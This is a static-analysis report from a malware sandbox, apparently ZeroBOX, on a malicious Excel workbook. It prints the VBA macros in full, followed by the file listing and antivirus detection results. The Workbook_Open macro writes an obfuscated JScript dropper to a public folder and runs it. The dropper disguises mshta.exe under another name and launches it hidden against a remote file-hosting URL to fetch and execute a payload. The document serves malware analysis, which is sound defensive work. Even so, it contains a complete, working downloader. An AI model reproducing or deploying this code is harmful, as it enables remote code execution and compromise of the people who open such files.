popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

Original

                                        Attribute VB_Name = "Module1"
Sub asd()

End Sub

Deobfuscated

                                        Attribute VB_Name = "Module1"
Sub asd()

End Sub

Original

                                        Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()

Dim oaksodkasd As String
jiaksidj = "!@##!!@%^@^^n&&$%#g&&$%#tcar:"
jiaksidj = Replace(jiaksidj, "!@##!", "W")
jiaksidj = Replace(jiaksidj, "!@%^@^^", "i")
jiaksidj = Replace(jiaksidj, "car", "s")
jiaksidj = Replace(jiaksidj, "&&$%#", "m")
iajsdkasodk = "iajsdkasodk5nooo_Proce66"
iajsdkasodk = Replace(iajsdkasodk, "iajsdkasodk", "W")
iajsdkasodk = Replace(iajsdkasodk, "5", "i")
iajsdkasodk = Replace(iajsdkasodk, "ooo", "32")
iajsdkasodk = Replace(iajsdkasodk, "6", "s")
oaksodkasd = "C:\Users\Public\killlll.js"
   Close
     Open oaksodkasd For Output As #1
Print #1, "function lopper(){var LOppEr=['winmgmts:','1456009rdwLAt','663ClWRYg','C:\x5cProgramData\x5cddond.com','Win32_ProcessStartup','40LjtzQV','12638fpIXvI','Get','C:\x5cWindows\x5cSystem32\x5cmshta.exe','2464XfxMdW','Win32_Process','C:\x5cProgramData\x5cddond.com\x20https://www.mediafire.com/file/p3ay4it08j1s7hp/0main.htm/file','CopyFile','14182570YQwwou','1815MwFNNL','395964FVtYbV','1636859QuYbxL','259188pMmCrq','Create','9DflaMq','SpawnInstance_','1610cSDLTU','Scripting.FileSystemObject','ShowWindow'];lopper=function(){return LOppEr;};return lopper();}function LoPPer(LoOO,lOOO){return looo(lOOO- -0xd9,LoOO);"
Print #1, "}(function(LOpper,LOoo){function LOOo(LOPper,looO){return looo(LOPper- -0x50,looO);}function lOOo(LooO,lOpPer){return looo(lOpPer-0x14a,LooO);}function LoPper(lOoO,LOpPer){return looo(LOpPer- -0x2e7,lOoO);}var loPper=LOpper();function lOPper(lopPer,LopPer){return looo(lopPer- -0x33f,LopPer);"
Print #1, "}while(!![]){try{var loOo=-parseInt(LoPper(-0x111,-0x10e))/(0x1215*-0x2+0x23b1+-0x1*-0x7a)+parseInt(LoPper(-0x125,-0x121))/(0x219c+-0x221e+0x84)*(parseInt(LoPper(-0x116,-0x10d))/(-0x2452+-0x2682+-0x1*-0x4ad7))+-parseInt(LOOo(0x179,0x176))/(-0x13b5+-0x2b*-0xd+0x8c5*0x2)*(parseInt(LOOo(0x185,0x17e))/(0x1*0x23e8+0x2*-0xf95+-0x4b9))+parseInt(lOPper(-0x170,-0x167))/(0x129d+-0x655*-0x3+0x1*-0x2596)+parseInt(lOPper(-0x16f,-0x172))/(-0x224+-0x1*-0x13f9+-0x8e7*0x2)*(-parseInt(lOOo(0x325,0x327))/(0x2*-0x607+-0x994+0x5e*0x3b))+parseInt(lOOo(0x31f,0x31d))/(-0x24a5+-0xdaa+0x3258)*(-parseInt(lOPper(-0x172,-0x173))/(0x1*0x221f+-0x7*0xf4+-0x1b69))+-parseInt(lOPper(-0x171,-0x179))/(0x1ed7+0x19df+-0x38ab)*(-parseInt(LOOo(0x181,0x17e))/(0x12f3+0x259*0x2+-0x7*0x35f));if(loOo===LOoo)break;"
Print #1, "else loPper['push'](loPper['shift']());}catch(LoOo){loPper['push'](loPper['shift']());}}}(lopper,0x5d5cf+-0x7*-0xdd65+-0x29*-0x83));function LOoO(LoppEr,lOppEr){return looo(lOppEr- -0x2be,LoppEr);}function looo(Looo,Lopper){var lOoo=lopper();return looo=function(lOpper,LOoo){lOpper=lOpper-(0x7*-0x52f+-0x1d99*0x1+0x43a8);var LOpper=lOoo[lOpper];return LOpper;},looo(Looo,Lopper);}megamon=LOoO(-0xe1,-0xe3);var Looo=new ActiveXObject(loPPer(0x46,0x52));function loOO(lOPPer,LOOO){return looo(LOOO-0x1d6,lOPPer);}var Lopper=Looo[loPPer(0x3f,0x48)](loPPer(0x39,0x44),megamon);KALYJA=LoPPer(0xf0,0xf2);var lOpper=GetObject(loOO(0x3ad,0x3ae))[LoPPer(0xe6,0xee)](loOO(0x3b2,0x3b2));lOpper[LOoO(-0xf3,-0xea)](),lOpper[loPPer(0x5e,0x53)]=0xb8b*-0x1+-0x2*-0x485+-0x1*-0x281;"
Print #1, "function loPPer(LOPPer,loppEr){return looo(loppEr- -0x184,LOPPer);}var lOoo=GetObject(LOoO(-0xe5,-0xe6))[loOO(0x391,0x39d)](loPPer(0x46,0x46))[loPPer(0x43,0x4e)](KALYJA,null,lOpper,null);"
Close
GetObject(jiaksidj).Get(iajsdkasodk).Create ("wscript C:\Users\Public\killlll.js")
End Sub

Deobfuscated

                                        Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()

Dim oaksodkasd As String
jiaksidj = "!@##!!@%^@^^n&&$%#g&&$%#tcar:"
jiaksidj = Replace(jiaksidj, "!@##!", "W")
jiaksidj = Replace(jiaksidj, "!@%^@^^", "i")
jiaksidj = Replace(jiaksidj, "car", "s")
jiaksidj = Replace(jiaksidj, "&&$%#", "m")
iajsdkasodk = "iajsdkasodk5nooo_Proce66"
iajsdkasodk = Replace(iajsdkasodk, "iajsdkasodk", "W")
iajsdkasodk = Replace(iajsdkasodk, "5", "i")
iajsdkasodk = Replace(iajsdkasodk, "ooo", "32")
iajsdkasodk = Replace(iajsdkasodk, "6", "s")
oaksodkasd = "C:\Users\Public\killlll.js"
   Close
     Open oaksodkasd For Output As #1
Print #1, "function lopper(){var LOppEr=['winmgmts:','1456009rdwLAt','663ClWRYg','C:\x5cProgramData\x5cddond.com','Win32_ProcessStartup','40LjtzQV','12638fpIXvI','Get','C:\x5cWindows\x5cSystem32\x5cmshta.exe','2464XfxMdW','Win32_Process','C:\x5cProgramData\x5cddond.com\x20https://www.mediafire.com/file/p3ay4it08j1s7hp/0main.htm/file','CopyFile','14182570YQwwou','1815MwFNNL','395964FVtYbV','1636859QuYbxL','259188pMmCrq','Create','9DflaMq','SpawnInstance_','1610cSDLTU','Scripting.FileSystemObject','ShowWindow'];lopper=function(){return LOppEr;};return lopper();}function LoPPer(LoOO,lOOO){return looo(lOOO- -0xd9,LoOO);"
Print #1, "}(function(LOpper,LOoo){function LOOo(LOPper,looO){return looo(LOPper- -0x50,looO);}function lOOo(LooO,lOpPer){return looo(lOpPer-0x14a,LooO);}function LoPper(lOoO,LOpPer){return looo(LOpPer- -0x2e7,lOoO);}var loPper=LOpper();function lOPper(lopPer,LopPer){return looo(lopPer- -0x33f,LopPer);"
Print #1, "}while(!![]){try{var loOo=-parseInt(LoPper(-0x111,-0x10e))/(0x1215*-0x2+0x23b1+-0x1*-0x7a)+parseInt(LoPper(-0x125,-0x121))/(0x219c+-0x221e+0x84)*(parseInt(LoPper(-0x116,-0x10d))/(-0x2452+-0x2682+-0x1*-0x4ad7))+-parseInt(LOOo(0x179,0x176))/(-0x13b5+-0x2b*-0xd+0x8c5*0x2)*(parseInt(LOOo(0x185,0x17e))/(0x1*0x23e8+0x2*-0xf95+-0x4b9))+parseInt(lOPper(-0x170,-0x167))/(0x129d+-0x655*-0x3+0x1*-0x2596)+parseInt(lOPper(-0x16f,-0x172))/(-0x224+-0x1*-0x13f9+-0x8e7*0x2)*(-parseInt(lOOo(0x325,0x327))/(0x2*-0x607+-0x994+0x5e*0x3b))+parseInt(lOOo(0x31f,0x31d))/(-0x24a5+-0xdaa+0x3258)*(-parseInt(lOPper(-0x172,-0x173))/(0x1*0x221f+-0x7*0xf4+-0x1b69))+-parseInt(lOPper(-0x171,-0x179))/(0x1ed7+0x19df+-0x38ab)*(-parseInt(LOOo(0x181,0x17e))/(0x12f3+0x259*0x2+-0x7*0x35f));if(loOo===LOoo)break;"
Print #1, "else loPper['push'](loPper['shift']());}catch(LoOo){loPper['push'](loPper['shift']());}}}(lopper,0x5d5cf+-0x7*-0xdd65+-0x29*-0x83));function LOoO(LoppEr,lOppEr){return looo(lOppEr- -0x2be,LoppEr);}function looo(Looo,Lopper){var lOoo=lopper();return looo=function(lOpper,LOoo){lOpper=lOpper-(0x7*-0x52f+-0x1d99*0x1+0x43a8);var LOpper=lOoo[lOpper];return LOpper;},looo(Looo,Lopper);}megamon=LOoO(-0xe1,-0xe3);var Looo=new ActiveXObject(loPPer(0x46,0x52));function loOO(lOPPer,LOOO){return looo(LOOO-0x1d6,lOPPer);}var Lopper=Looo[loPPer(0x3f,0x48)](loPPer(0x39,0x44),megamon);KALYJA=LoPPer(0xf0,0xf2);var lOpper=GetObject(loOO(0x3ad,0x3ae))[LoPPer(0xe6,0xee)](loOO(0x3b2,0x3b2));lOpper[LOoO(-0xf3,-0xea)](),lOpper[loPPer(0x5e,0x53)]=0xb8b*-0x1+-0x2*-0x485+-0x1*-0x281;"
Print #1, "function loPPer(LOPPer,loppEr){return looo(loppEr- -0x184,LOPPer);}var lOoo=GetObject(LOoO(-0xe5,-0xe6))[loOO(0x391,0x39d)](loPPer(0x46,0x46))[loPPer(0x43,0x4e)](KALYJA,null,lOpper,null);"
Close
GetObject(jiaksidj).Get(iajsdkasodk).Create ("wscript C:\Users\Public\killlll.js")
End Sub

Original

                                        Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Deobfuscated

                                        Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
[Content_Types].xml
_rels/.rels
r:"y_dl
xl/workbook.xml
,I]'t2
xl/_rels/workbook.xml.rels
aU^_-_
xl/worksheets/sheet1.xml
HM-qI,I
xl/theme/theme1.xml
k8(4|OH
bP{}2!#
RSLX"7
%Cr`%R.
=|d#a[
|]p+~o
xl/styles.xml
g"$Q4<8
xl/vbaProject.bin
,;U/;B
auT8~
wd`1>
3=dJ[.
C};R}9
dsg5B)h
.#)qBpv
?2R(jC
<2r%]mC
xl/worksheets/_rels/sheet1.xml.rels
xl/printerSettings/printerSettings1.bin
docProps/core.xml
docProps/app.xml
[Content_Types].xmlPK
_rels/.relsPK
xl/workbook.xmlPK
xl/_rels/workbook.xml.relsPK
xl/worksheets/sheet1.xmlPK
xl/theme/theme1.xmlPK
xl/styles.xmlPK
xl/vbaProject.binPK
xl/worksheets/_rels/sheet1.xml.relsPK
xl/printerSettings/printerSettings1.binPK
docProps/core.xmlPK
docProps/app.xmlPK
Antivirus Signature
Bkav Clean
Lionic Trojan.Script.Generic.4!c
MicroWorld-eScan Trojan.GenericKD.39468879
FireEye Trojan.GenericKD.39468879
CAT-QuickHeal Clean
ALYac Trojan.Downloader.XLS.Gen
Malwarebytes Clean
Sangfor Clean
Trustlook Clean
BitDefender Trojan.GenericKD.39468879
K7GW Clean
K7AntiVirus Clean
Arcabit Trojan.Generic.D25A3F4F
Baidu Clean
Cyren Clean
Symantec CL.Downloader!gen87
ESET-NOD32 VBA/TrojanDropper.Agent.CNI
TrendMicro-HouseCall Clean
Avast Other:Malware-gen [Trj]
ClamAV Clean
Kaspersky UDS:DangerousObject.Multi.Generic
Alibaba Trojan:Win32/MalDoc.ali1000158
NANO-Antivirus Clean
ViRobot XLS.Z.Agent.16198
Rising Malware.Obfus/VBA@AI.82 (VBA)
Ad-Aware Trojan.GenericKD.39468879
TACHYON Clean
Sophos Clean
Comodo Clean
F-Secure Clean
DrWeb Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition RDN/Powdow
CMC Clean
Emsisoft Trojan.GenericKD.39468879 (B)
SentinelOne Clean
Avast-Mobile Clean
Jiangmin Clean
Avira VBS/Drop.Agent.jcaqi
Antiy-AVL Trojan/Generic.ASMacro.30C16
Kingsoft Clean
Gridinsoft Clean
Microsoft TrojanDownloader:O97M/EncDoc.JRSM!MTB
SUPERAntiSpyware Clean
ZoneAlarm Clean
GData Trojan.GenericKD.39468879
Cynet Malicious (score: 99)
AhnLab-V3 Clean
Acronis Clean
McAfee RDN/Powdow
MAX malware (ai score=86)
VBA32 Clean
Zoner Probably Heur.W97Obfuscated
Tencent Clean
Yandex Clean
Ikarus Clean
MaxSecure Clean
Fortinet VBA/Agent.XPW!tr
BitDefenderTheta Clean
AVG Other:Malware-gen [Trj]
Panda Clean
No IRMA results available.